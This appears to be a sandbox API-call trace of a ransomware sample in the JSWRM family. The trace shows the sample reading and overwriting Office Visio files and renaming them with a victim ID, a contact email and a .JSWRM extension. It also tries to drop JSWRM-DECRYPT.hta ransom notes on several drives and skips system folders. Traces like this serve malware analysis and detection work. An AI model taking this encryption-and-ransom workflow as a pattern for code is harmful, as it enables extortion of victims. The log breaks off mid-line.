[0148.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETERM_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETERM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeterm_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.697] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=85908) returned 1 [0148.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.698] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14f90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x14f90, lpOverlapped=0x0) returned 1 [0148.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.710] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14f90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x14f90, lpOverlapped=0x0) returned 1 [0148.711] CloseHandle (hObject=0x314) returned 1 [0148.711] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETERM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeterm_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETERM_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeterm_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.713] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c1d957, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c1d957, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c1d957, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x113b8, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EETRAN_M.VSSX", cAlternateFileName="EETRAN~2.VSS")) returned 1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2=".") returned 1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="..") returned 1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="...") returned 1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="windows") returned -1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="recovery") returned -1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="perflogs") returned -1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="documents and settings") returned 1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="system volume information") returned -1 [0148.713] lstrcmpiW (lpString1="EETRAN_M.VSSX", lpString2="msocache") returned -1 [0148.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETRAN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETRAN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETRAN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetran_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.714] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=70584) returned 1 [0148.714] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.714] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x113b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x113b0, lpOverlapped=0x0) returned 1 [0148.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.721] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x113b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x113b0, lpOverlapped=0x0) returned 1 [0148.721] CloseHandle (hObject=0x314) returned 1 [0148.722] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETRAN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetran_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETRAN_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetran_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.723] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b38b79, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3b38b79, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3b38b79, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1073d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EETRAN_U.VSSX", cAlternateFileName="EETRAN~1.VSS")) returned 1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2=".") returned 1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="..") returned 1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="...") returned 1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="windows") returned -1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="recovery") returned -1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="perflogs") returned -1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="documents and settings") returned 1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="system volume information") returned -1 [0148.723] lstrcmpiW (lpString1="EETRAN_U.VSSX", lpString2="msocache") returned -1 [0148.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETRAN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETRAN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETRAN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETRAN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetran_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.724] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=67389) returned 1 [0148.724] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.724] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10730, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x10730, lpOverlapped=0x0) returned 1 Thread: id = 79 os_tid = 0xfc0 [0058.153] GetLastError () returned 0x57 [0058.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x202548 [0058.153] SetLastError (dwErrCode=0x57) [0058.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.301] GetFileAttributesW (lpFileName="D:\\JSWRM-DECRYPT.hta" (normalized: "d:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x359c95c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.306] CreateFileW (lpFileName="D:\\JSWRM-DECRYPT.hta" (normalized: "d:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.307] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.307] WriteFile (in: hFile=0xffffffff, lpBuffer=0x359ca70, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x359ca3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x359ca3c, lpOverlapped=0x0) returned 0 [0058.307] CloseHandle (hObject=0xffffffff) returned 1 [0058.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.307] FindFirstFileW (in: lpFileName="D:\\*.*", lpFindFileData=0x359faf8 | out: lpFindFileData=0x359faf8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xbc78\x23\x2540\x20\x2540\x20\x0a")) returned 0xffffffff [0058.307] GetCurrentThreadId () returned 0xfc0 [0058.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a558 | out: hHeap=0x1e0000) returned 1 [0058.307] GetLastError () returned 0x3 [0058.307] SetLastError (dwErrCode=0x3) [0058.307] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2290a0 | out: hHeap=0x1e0000) returned 1 [0058.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x202548 | out: hHeap=0x1e0000) returned 1 Thread: id = 80 os_tid = 0x8ac [0058.309] GetLastError () returned 0x57 [0058.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.309] SetLastError (dwErrCode=0x57) [0058.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.313] GetFileAttributesW (lpFileName="E:\\JSWRM-DECRYPT.hta" (normalized: "e:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x36dc604, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.318] CreateFileW (lpFileName="E:\\JSWRM-DECRYPT.hta" (normalized: "e:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.318] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.318] WriteFile (in: hFile=0xffffffff, lpBuffer=0x36dc718, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x36dc6e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36dc6e4, lpOverlapped=0x0) returned 0 [0058.318] CloseHandle (hObject=0xffffffff) returned 1 [0058.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.318] FindFirstFileW (in: lpFileName="E:\\*.*", lpFindFileData=0x36df7a0 | out: lpFindFileData=0x36df7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.318] GetCurrentThreadId () returned 0x8ac [0058.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4c8 | out: hHeap=0x1e0000) returned 1 [0058.318] GetLastError () returned 0x3 [0058.318] SetLastError (dwErrCode=0x3) [0058.318] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229280 | out: hHeap=0x1e0000) returned 1 [0058.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 81 os_tid = 0x8f0 [0058.320] GetLastError () returned 0x57 [0058.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.320] SetLastError (dwErrCode=0x57) [0058.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.324] GetFileAttributesW (lpFileName="F:\\JSWRM-DECRYPT.hta" (normalized: "f:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x381c89c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.329] CreateFileW (lpFileName="F:\\JSWRM-DECRYPT.hta" (normalized: "f:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.329] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.329] WriteFile (in: hFile=0xffffffff, lpBuffer=0x381c9b0, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x381c97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x381c97c, lpOverlapped=0x0) returned 0 [0058.329] CloseHandle (hObject=0xffffffff) returned 1 [0058.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.329] FindFirstFileW (in: lpFileName="F:\\*.*", lpFindFileData=0x381fa38 | out: lpFindFileData=0x381fa38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.329] GetCurrentThreadId () returned 0x8f0 [0058.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a570 | out: hHeap=0x1e0000) returned 1 [0058.329] GetLastError () returned 0x3 [0058.329] SetLastError (dwErrCode=0x3) [0058.329] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2290c0 | out: hHeap=0x1e0000) returned 1 [0058.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 82 os_tid = 0xd2c [0058.331] GetLastError () returned 0x57 [0058.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.331] SetLastError (dwErrCode=0x57) [0058.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.335] GetFileAttributesW (lpFileName="G:\\JSWRM-DECRYPT.hta" (normalized: "g:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x395c584, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 